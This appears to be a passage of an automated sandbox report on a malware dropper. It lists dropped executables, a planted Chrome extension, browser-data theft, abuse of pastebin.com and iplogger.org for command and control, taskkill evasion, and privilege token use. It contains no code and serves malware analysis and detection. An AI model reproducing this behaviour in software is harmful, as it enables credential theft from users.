Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c78ded4d176ac.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue192762f1cd058ddf8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1993b3f72c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19150ee2be694c8a4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up geolocation information via web service

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19150ee2be694c8a4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1993b3f72c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1969586bcbf58493.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19325eb008c0b950.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331540431966" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c78ded4d176ac.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
